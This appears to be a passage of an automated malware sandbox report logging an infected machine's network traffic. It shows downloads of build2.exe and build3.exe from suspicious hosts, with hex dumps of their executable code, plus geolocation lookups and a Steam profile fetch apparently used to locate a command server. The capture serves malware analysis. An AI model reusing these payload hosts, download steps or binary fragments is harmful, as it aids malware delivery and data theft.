KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtroyViFCj0EsR0pAuVec\\nSwgxLnz3IehW\/o0yGSnMPag8Nrb6xgfVPcc2dqQWJuO7woEiHGghK7Z1F2SOxz\/p\\nIu5pa1Tz2\/5WnhdJrIp8vanGLQUX1rmckhNhU9UeXgAuhqTI7v866woml\/q06dHx\\nz90ihti25++wDXZqKUm9VtMf+c1rvufALCTdeiIAIpEBLZdMAKKBdCCgTgt1DBhK\\nU7OjETFYJTG1B7w7xxlf0z7r4+fgb68dp3vo5WHvcfoBw\/TLBjD7T8xTZ\/Cn9j0b\\n\/VwHGbdJUODPrOnQ1rs4gOOpz9XPuMUnqEomJcQpI74Ak3+lgpp04ByowIUbFCV5\\nAwIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"itkm7MOsOlVQkbEQhWCVEWoMyGFhVjgEdpNlgfiz"}

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 01:44:26.825977087 CEST	91	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: sdfjhuz.com
Apr 24, 2024 01:44:27.703953028 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 23 Apr 2024 23:44:27 GMT Content-Type: application/octet-stream Content-Length: 296448 Last-Modified: Tue, 23 Apr 2024 19:19:16 GMT Connection: close ETag: "662809b4-48600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce d6 de 9e 8a b7 b0 cd 8a b7 b0 cd 8a b7 b0 cd 87 e5 6f cd 90 b7 b0 cd 87 e5 50 cd f6 b7 b0 cd 87 e5 51 cd a6 b7 b0 cd 83 cf 23 cd 83 b7 b0 cd 8a b7 b1 cd f8 b7 b0 cd 3f 29 55 cd 8b b7 b0 cd 87 e5 6b cd 8b b7 b0 cd 3f 29 6e cd 8b b7 b0 cd 52 69 63 68 8a b7 b0 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 47 05 fb 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e6 00 00 00 30 60 01 00 00 00 00 6d 40 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 61 01 00 04 00 00 00 d6 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 6a 01 00 64 00 00 00 00 40 60 01 66 ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 60 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 e4 00 00 00 10 00 00 00 e6 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 74 00 00 00 00 01 00 00 76 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 b5 5e 01 00 80 01 00 00 36 02 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 66 ef 00 00 00 40 60 01 00 f0 00 00 00 96 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 0c 25 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$oPQ#?)Uk?)nRichPELGc0`m@@0ajd@`f8@`@.text `.rdataPtv@@.data^6`@.rsrcf@`@@%
Apr 24, 2024 01:44:27.704478979 CEST	1289	IN	Data Raw: a0 01 e8 4e 02 00 00 68 09 f4 40 00 e8 3f 26 00 00 59 c3 b9 14 25 a0 01 e8 a1 02 00 00 68 ff f3 40 00 e8 29 26 00 00 59 c3 b9 00 25 a0 01 e8 f8 02 00 00 68 f5 f3 40 00 e8 13 26 00 00 59 c3 6a 00 b9 08 25 a0 01 e8 ee 00 00 00 c3 6a 00 b9 fc 24 a0 Data Ascii: Nh@?&Y%h@)&Y%h@&Yj%j$j%j%UQQQQ$!]EYY]UVEP,A^],ANUVEtV%Y^]UE]UE8
Apr 24, 2024 01:44:27.989181042 CEST	1289	IN	Data Raw: 15 34 00 41 00 53 8d 85 b4 fb ff ff 50 53 ff 15 90 00 41 00 8d 45 c8 50 53 8d 45 b4 50 53 ff 15 88 00 41 00 53 53 53 53 53 53 53 ff 15 44 00 41 00 8b 45 f8 8b 0d f0 24 a0 01 2b f8 83 f9 0c 75 07 53 ff 15 80 00 41 00 8b c7 c1 e0 04 89 45 f4 8b 45 Data Ascii: 4ASPSAEPSEPSASSSSSSSDAE$+uSAEEEMUEEEEM3U3UME)ENt]MuE~_^[]V5$W=tNu_^UQeEE]UQQh^A
Apr 24, 2024 01:44:27.989490986 CEST	1289	IN	Data Raw: 44 53 f7 65 ec 8b 45 ec 81 6d fc f0 06 bd 57 81 6d cc f5 90 30 07 81 6d dc 7b e3 2f 6b 33 ff 81 3d f0 24 a0 01 00 04 00 00 75 57 57 57 57 ff 15 94 00 41 00 57 57 57 57 ff 15 60 00 41 00 57 ff 15 4c 00 41 00 57 57 57 57 ff 15 70 00 41 00 57 57 57 Data Ascii: DSeEmWm0m{/k3=$uWWWWAWWWW`AWLAWWWWpAWWWWAWW"WW"WWA8q Fr\|WtA{+F\|\|AW<AW8AX~}5EzuFT\|tA$h
Apr 24, 2024 01:44:27.990010977 CEST	1289	IN	Data Raw: 45 fc 02 50 e8 54 fd ff ff 8b c8 e8 98 00 00 00 89 45 e8 b8 37 1f 40 00 c3 83 4d fc ff 8b 7d e4 8b 75 e0 8b 5d e8 83 7d 0c 00 76 14 ff 75 0c 8b cf e8 07 ff ff ff 50 53 e8 aa f1 ff ff 83 c4 0c 6a 00 6a 01 8b cf e8 a3 fc ff ff 8d 45 e8 8b cf 50 57 Data Ascii: EPTE7@M}u]}vuPSjjEPWEPluwM_^d[]Mjj`jjH"UuY]U]UM.]UVM/UP'^]3
Apr 24, 2024 01:44:27.990145922 CEST	1289	IN	Data Raw: 6f 0e 83 e9 10 8d 76 10 66 0f 7f 0f 8d 7f 10 eb e8 0f ba e1 02 73 0d 8b 06 83 e9 04 8d 76 04 89 07 8d 7f 04 0f ba e1 03 73 11 f3 0f 7e 0e 83 e9 08 8d 76 08 66 0f d6 0f 8d 7f 08 8b 04 8d 98 25 40 00 ff e0 f7 c7 03 00 00 00 75 15 c1 e9 02 83 e2 03 Data Ascii: ovfsvs~vf%@ur*$%@r$$@$%@$,%@$@$@%@#FGFGr$%@I#FGr$%@#
Apr 24, 2024 01:44:28.271040916 CEST	1289	IN	Data Raw: ec 2c a1 a4 87 41 00 33 c5 89 45 fc 8b 45 08 8d 4d d4 53 56 8b 75 0c 57 ff 75 10 89 45 ec 8b 45 14 89 45 e4 e8 4b ff ff ff 8d 45 d4 33 ff 50 57 57 57 57 56 8d 45 e8 50 8d 45 f0 50 e8 f3 29 00 00 8b d8 83 c4 20 8b 45 e4 85 c0 74 05 8b 4d e8 89 08 Data Ascii: ,A3EEMSVuWuEEEKE3PWWWWVEPEP) EtMuEPd$YYutujutj_}tMapM_^3["]U(A3ESVuMWu}E3PSSSSVEPEPX)EEWPg(E
Apr 24, 2024 01:44:28.271208048 CEST	1289	IN	Data Raw: 2e 40 00 23 d1 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 c1 e9 02 88 47 02 83 c6 03 83 c7 03 83 f9 08 72 cc f3 a5 ff 24 95 18 2f 40 00 8d 49 00 23 d1 8a 06 88 07 8a 46 01 c1 e9 02 88 47 01 83 c6 02 83 c7 02 83 f9 08 72 a6 f3 a5 ff 24 95 18 2f 40 00 Data Ascii: .@#FGFGr$/@I#FGr$/@#r$/@I/@.@.@.@.@.@.@.@DDDDDDDDDDDDDD$/@(/@0/@</@P/@D$
Apr 24, 2024 01:44:28.277301073 CEST	1289	IN	Data Raw: 85 47 3c 00 00 ba 12 00 00 00 8d 0d 00 80 41 00 e8 40 3d 00 00 5a c3 55 8b ec 83 7d 08 00 74 2d ff 75 08 6a 00 ff 35 b4 b5 43 00 ff 15 b0 00 41 00 85 c0 75 18 56 e8 a7 36 00 00 8b f0 ff 15 ac 00 41 00 50 e8 ac 36 00 00 59 89 06 5e 5d c3 cc cc cc Data Ascii: G<A@=ZU}t-uj5CAuV6AP6Y^]L$t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+W\|$
Apr 24, 2024 01:44:28.277681112 CEST	1289	IN	Data Raw: 5e 01 00 00 8d 8d fc ef ff ff 85 ff 74 33 8b d1 03 d0 4f 3b ca 73 2a 8a 01 3c 0d 75 13 8d 42 ff 3b c8 73 18 8d 41 01 80 38 0a 75 10 8b c8 eb 0c 0f b6 c0 0f be 80 f0 8c 41 00 03 c8 41 85 ff 75 d1 8d 85 fc ef ff ff 2b f0 8d 04 31 e9 72 01 00 00 8b Data Ascii: ^t3O;s*<uB;sA8uAAu+1rCDt:uGB;ru .u619Xu+ppjC[D
Apr 24, 2024 01:44:28.277892113 CEST	1289	IN	Data Raw: 08 e8 c1 ff ff ff 59 ff 75 08 ff 15 c0 00 41 00 cc 55 8b ec e8 bc 53 00 00 ff 75 08 e8 11 54 00 00 59 68 ff 00 00 00 e8 a3 00 00 00 cc 6a 01 6a 01 6a 00 e8 4d 01 00 00 83 c4 0c c3 6a 01 6a 00 6a 00 e8 3e 01 00 00 83 c4 0c c3 55 8b ec 83 3d b0 10 Data Ascii: YuAUSuTYhjjjMjjj>U=AthAUYtuAYVhAhAYYuCh@k$AhAv=5YYth5UYtjjj53]Ujju]VjAVW

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 01:44:30.698599100 CEST	96	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Apr 24, 2024 01:44:31.892071009 CEST	1289	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:44:50 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 Last-Modified: Mon, 09 Oct 2023 19:50:06 GMT ETag: "4ae00-6074de5a4a562" Accept-Ranges: bytes Content-Length: 306688 Connection: close Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6krh8rh8rh88sh8l8nh8l8h8U_8{h8ri8h8l82h8l8sh8l8sh8Richrh8PELaj; @>lhd>/0@.textrhj `.data:n@.kic>\|@.rsrc/>0~@@
Apr 24, 2024 01:44:31.892136097 CEST	1289	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 73 03 00 00 00 00 00 8c 73 03 00 9c 73 03 00 00 00 00 00 f6 6b 03 00 0c 6c 03 00 22 6c 03 00 2e 6c 03 00 48 6c 03 00 5a 6c 03 00 70 6c 03 00 86 6c 03 00 96 6c 03 00 ac 6c 03 00 c0 6c 03 00 d0 6c 03 00 ec Data Ascii: ssskl"l.lHlZlpllllllllm m4mBm^mtmmmmmmmnn&n@n\nlnnnnnnnnnoo,o@oTo`opoookooo
Apr 24, 2024 01:44:32.188204050 CEST	1289	IN	Data Raw: 53 00 6f 00 6c 00 6f 00 66 00 75 00 64 00 69 00 20 00 67 00 6f 00 78 00 6f 00 72 00 75 00 76 00 20 00 73 00 61 00 70 00 6f 00 63 00 75 00 7a 00 69 00 00 00 4e 00 69 00 6d 00 69 00 67 00 6f 00 74 00 20 00 67 00 69 00 66 00 6f 00 76 00 75 00 00 00 Data Ascii: Solofudi goxoruv sapocuziNimigot gifovuwelxolatxojiliFapejepuzeh wororuv mezumitelaMawoyujewoyosigubufozo wami xuxolesenawemo dohamefejexe
Apr 24, 2024 01:44:32.188302040 CEST	1289	IN	Data Raw: 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 20 00 3e 00 20 00 3e 00 3a 00 3a 00 6f 00 70 00 65 00 72 00 61 00 74 Data Ascii: ,class std::allocator<char> > > >::operator +=("this->_Has_container()", 0)C:\Program Files (x86)\Microsoft Visual Stud
Apr 24, 2024 01:44:32.188359976 CEST	1289	IN	Data Raw: 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 62 00 61 00 73 00 69 00 63 00 5f 00 73 00 74 00 72 00 69 00 6e 00 67 00 3c 00 63 00 68 00 61 00 72 00 2c 00 73 00 74 00 72 00 75 00 63 00 74 00 Data Ascii: cator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Vector_const_iterator
Apr 24, 2024 01:44:32.188421965 CEST	1289	IN	Data Raw: 00 00 00 00 00 73 00 72 00 63 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 Data Ascii: src != NULLmemcpy_sf:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.cdst != NULLmemmove_sf:\dd\vctools\crt_bld\sel
Apr 24, 2024 01:44:32.483958006 CEST	1289	IN	Data Raw: 20 00 43 00 2b 00 2b 00 20 00 64 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 61 00 74 00 69 00 6f 00 6e 00 20 00 6f 00 6e 00 20 00 61 00 73 00 73 00 65 00 72 00 74 00 73 00 2e 00 00 00 00 00 6d 00 65 00 6d 00 63 00 70 00 79 00 5f 00 73 00 28 00 Data Ascii: C++ documentation on asserts.memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot
Apr 24, 2024 01:44:32.484045982 CEST	1289	IN	Data Raw: 00 55 00 4c 00 4c 00 29 00 00 00 70 00 75 00 74 00 63 00 00 00 00 00 76 00 73 00 63 00 61 00 6e 00 66 00 00 00 00 00 66 00 3a 00 5c 00 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c Data Ascii: ULL)putcvscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\dd\vctools\crt_bld\se
Apr 24, 2024 01:44:32.484150887 CEST	1289	IN	Data Raw: 72 65 61 6c 6c 6f 63 28 29 00 00 00 00 00 45 72 72 6f 72 3a 20 6d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 69 6f 6e 3a 20 62 61 64 20 6d 65 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 79 70 65 2e 0a 0a 4d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61 Data Ascii: realloc()Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-allocation failure at file %hs
Apr 24, 2024 01:44:32.484225035 CEST	1289	IN	Data Raw: 20 66 72 65 65 20 66 61 69 6c 75 72 65 2e 0a 00 00 00 00 00 00 54 68 65 20 42 6c 6f 63 6b 20 61 74 20 30 78 25 70 20 77 61 73 20 61 6c 6c 6f 63 61 74 65 64 20 62 79 20 61 6c 69 67 6e 65 64 20 72 6f 75 74 69 6e 65 73 2c 20 75 73 65 20 5f 61 6c 69 Data Ascii: free failure.The Block at 0x%p was allocated by aligned routines, use _aligned_free()_msize_dbg%hs located at 0x%p is %Iu bytes long.%hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).HEAP C
Apr 24, 2024 01:44:32.484337091 CEST	1289	IN	Data Raw: 61 00 74 00 65 00 20 00 21 00 3d 00 20 00 4e 00 55 00 4c 00 4c 00 00 00 4f 62 6a 65 63 74 20 64 75 6d 70 20 63 6f 6d 70 6c 65 74 65 2e 0a 00 00 63 72 74 20 62 6c 6f 63 6b 20 61 74 20 30 78 25 70 2c 20 73 75 62 74 79 70 65 20 25 78 2c 20 25 49 75 Data Ascii: ate != NULLObject dump complete.crt block at 0x%p, subtype %x, %Iu bytes long.normal block at 0x%p, %Iu bytes long.client block at 0x%p, subtype %x, %Iu bytes long.{%ld} %hs(%d) : #File Error#(%d) : Dumping objects

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:20 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-23 23:44:20 UTC	889	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:44:20 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6CiftbGrFOBk4pdWXeA%2BncOnba5HTukn7XR%2F3BYm3G9URYPqD1fFE10jD%2FvGcVLErLV7SM8LSv8azopV4ftUSRgN1i8rr4tKw01f5EVErR3jVez6Jz0kXRQGTGax"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8791b89019a70926-LAX alt-svc: h3=":443"; ma=86400
2024-04-23 23:44:20 UTC	405	IN	Data Raw: 31 38 65 0d 0a 7b 22 69 70 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 34 5c 75 30 34 33 30 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c Data Ascii: 18e{"ip":"154.16.105.36","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Nevada","region_rus":"\u041d\u0435\u0432\u0430\u0434\u0430","region_ua":"\u041d\u0435\u0432\
2024-04-23 23:44:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:22 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-04-23 23:44:23 UTC	893	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:44:23 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hMPMiBafsCsXbXAcDY390m%2FklW98o8kl64qXQmQWedboJ6%2Fp%2F9WS23x%2FzZ9jnjG2oGXINwykaZS4rhmpNkDsOtw8mR2h1FABZM5N6s82T%2FRgp5Mm5mvjXXhPBjEV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8791b89d3efd08d6-LAX alt-svc: h3=":443"; ma=86400
2024-04-23 23:44:23 UTC	405	IN	Data Raw: 31 38 65 0d 0a 7b 22 69 70 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c 75 30 34 33 30 5c 75 30 34 33 34 5c 75 30 34 33 30 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 33 35 5c 75 30 34 33 32 5c Data Ascii: 18e{"ip":"154.16.105.36","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"Nevada","region_rus":"\u041d\u0435\u0432\u0430\u0434\u0430","region_ua":"\u041d\u0435\u0432\
2024-04-23 23:44:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-23 23:44:31 UTC	119	OUT	GET /profiles/76561199673019888 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-04-23 23:44:31 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net 